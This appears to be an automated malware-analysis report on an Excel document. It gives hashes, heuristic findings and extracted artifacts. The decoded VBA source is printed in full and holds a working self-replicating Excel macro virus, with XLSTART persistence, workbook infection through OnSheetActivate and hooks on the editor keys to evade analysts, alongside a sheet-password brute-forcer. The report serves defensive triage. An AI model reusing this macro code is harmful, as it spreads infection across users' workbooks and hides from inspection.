Office (OLE) malware analysis — malicious · cf0d08c029cf1280

MALICIOUS

Office (OLE)

1.49 MB Created: 2007-03-19 08:27:44 Authoring application: Microsoft Excel First seen: 2014-01-03

MD5: bd3a38e440d555a245477fd9de782f61 SHA-1: c15761629d6d375a0c9c12b379a1236ba8ad8257 SHA-256: cf0d08c029cf12806caecff94d024a1f47a5ef6a85026ece3c918a3fde9f60e7

250 Risk Score

Heuristics 8

Legacy Flash object embedded in Office document high CVE related OFFICE_LEGACY_SWF_OBJECT

Office document embeds a ShockwaveFlash ActiveX object with a legacy SWF version (5). This is old Flash-in-Office exploit-family evidence, not a specific Flash CVE without SWF tag-level validation.
Embedded Adobe Flash (SWF) in OLE document critical OFFICE_EMBEDDED_SWF

Document contains an embedded Adobe Flash (SWF) object. Vulnerabilities such as CVE-2018-4878 and CVE-2018-15982 involved Flash objects embedded in Office files. Adobe Flash has been end-of-life since December 2020.
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
Application.OnSheetActivate = "StartUp.xls!cop"
```
VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION

The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
Matched line in script
```
Application.OnKey "%{F11}", "StartUp.xls!escape"
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7764 bytes
SHA-256: `927c3d970cef49f16dd52e169078f736540c4c13c7b34787c481786c0586be47`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "ShockwaveFlash2, 3, 1, ShockwaveFlashObjects, ShockwaveFlash" Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "模块1" Public Sub 工作表保护密码破解() Const DBLSPACE As String = vbNewLine & vbNewLine Const AUTHORS As String = DBLSPACE & vbNewLine & _ "作者:圣天" Const HEADER As String = "工作表保护密码破解" Const VERSION As String = DBLSPACE & "版本 Version 1.1.1" Const REPBACK As String = DBLSPACE & "" Const ZHENGLI As String = DBLSPACE & " XXXXXXX" Const ALLCLEAR As String = DBLSPACE & "该工作簿中的工作表密码保护已全部解除!!" & DBLSPACE & "请记得另保存" _ & DBLSPACE & "注意：不要用在不当地方，要尊重他人的劳动成果！" Const MSGNOPWORDS1 As String = "该文件工作表中没有加密" Const MSGNOPWORDS2 As String = "该文件工作表中没有加密2" Const MSGTAKETIME As String = "解密需花费一定时间,请耐心等候!" & DBLSPACE & "按确定开始破解!" Const MSGPWORDFOUND1 As String = "密码重新组合为:" & DBLSPACE & "$$" & DBLSPACE & _ "如果该文件工作表有不同密码,将搜索下一组密码并修改清除" Const MSGPWORDFOUND2 As String = "密码重新组合为:" & DBLSPACE & "$$" & DBLSPACE & _ "如果该文件工作表有不同密码,将搜索下一组密码并解除" Const MSGONLYONE As String = "确保为唯一的?" Dim w1 As Worksheet, w2 As Worksheet Dim i As Integer, j As Integer, k As Integer, l As Integer Dim m As Integer, n As Integer, i1 As Integer, i2 As Integer Dim i3 As Integer, i4 As Integer, i5 As Integer, i6 As Integer Dim PWord1 As String Dim ShTag As Boolean, WinTag As Boolean Application.ScreenUpdating = False With ActiveWorkbook WinTag = .ProtectStructure Or .ProtectWindows End With ShTag = False For Each w1 In Worksheets ShTag = ShTag Or w1.ProtectContents Next w1 If Not ShTag And Not WinTag Then MsgBox MSGNOPWORDS1, vbInformation, HEADER Exit Sub End If MsgBox MSGTAKETIME, vbInformation, HEADER If Not WinTag Then Else On Error Resume Next Do 'dummy do loop For i = 65 To 66: For j = 65 To 66: For k = 65 To 66 For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66 For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66 For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126 With ActiveWorkbook .Unprotect Chr(i) & Chr(j) & Chr(k) & _ Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _ Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n) If .ProtectStructure = False And _ .ProtectWindows = False Then PWord1 = Chr(i) & Chr(j) & Chr(k) & Chr(l) & _ Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _ Chr(i4) & Chr(i5) & Chr(i6) & Chr(n) MsgBox Application.Substitute(MSGPWORDFOUND1, _ "$$", PWord1), vbInformation, HEADER Exit Do 'Bypass all for...nexts End If End With Next: Next: Next: Next: Next: Next Next: Next: Next: Next: Next: Next Loop Until True On Error GoTo 0 End If If WinTag And Not ShTag Then MsgBox MSGONLYONE, vbInformation, HEADER Exit Sub End If On Error Resume Next For Each w1 In Worksheets 'Attempt clearance with PWord1 w1.Unprotect PWord1 Next w1 On Error GoTo 0 ShTag = False For Each w1 In Worksheets 'Checks for all clear ShTag triggered to 1 if not. ShTag = ShTag Or w1.ProtectContents Next w1 If ShTag Then For Each w1 In Worksheets With w1 If .ProtectContents Then On Error Resume Next Do 'Dummy do loop For i = 65 To 66: For j = 65 To 66: For k = 65 To 66 For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66 For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66 For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126 .Unprotect Chr(i) & Chr(j) & Chr(k) & _ Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _ Chr(i4) & Chr(i5) & Chr(i6) & Chr(n) If Not .ProtectContents Then PWord1 = Chr(i) & Chr(j) & Chr(k) & Chr(l) & _ Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _ Chr(i4) & Chr(i5) & Chr(i6) & Chr(n) MsgBox Application.Substitute(MSGPWORDFOUND2, _ "$$", PWord1), vbInformation, HEADER 'leverage finding Pword by trying on other sheets For Each w2 In Worksheets w2.Unprotect PWord1 Next w2 Exit Do 'Bypass all for...nexts End If Next: Next: Next: Next: Next: Next Next: Next: Next: Next: Next: Next Loop Until True On Error GoTo 0 End If End With Next w1 End If MsgBox ALLCLEAR & AUTHORS & VERSION & REPBACK & ZHENGLI, vbInformation, HEADER End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "StartUp" Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub escape() On Error Resume Next Application.OnSheetActivate = "StartUp.xls!back" Application.OnKey "%{F11}" Application.OnKey "%{F8}" Application.SendKeys "%{F11}" Application.SendKeys "%{F8}" For Each book In Workbooks Application.DisplayAlerts = False If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete Next For Each book In Workbooks If book.Name = "StartUp.xls" Then book.Close End If Next End Sub Sub back() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!cop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD001673F7/Ole10Native	932617 bytes
SHA-256: `a9954bc02785462f33353a86452cb7a386f2af43a44c8240b00e38e7d43fe7fa`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.77, consistent with packed or encrypted content.
`ole10native_00_3A2OAIE3a3E1AIi.mp3`	ole-package-payload	OLE Ole10Native payload: MBD001673F7/Ole10Native; display_name=³Â°²Ö®ÀÏÊ¦³ª³É¹¦ÐÂÌìµØ.mp3; full_path=D:\KuGou\³Â°²Ö®~1.MP3; temp_path=; def_file=	932526 bytes
SHA-256: `bf17b7491d6ea29d10f049858400d714f04d763c53d8a81bb9c535dc7043003f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.77, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.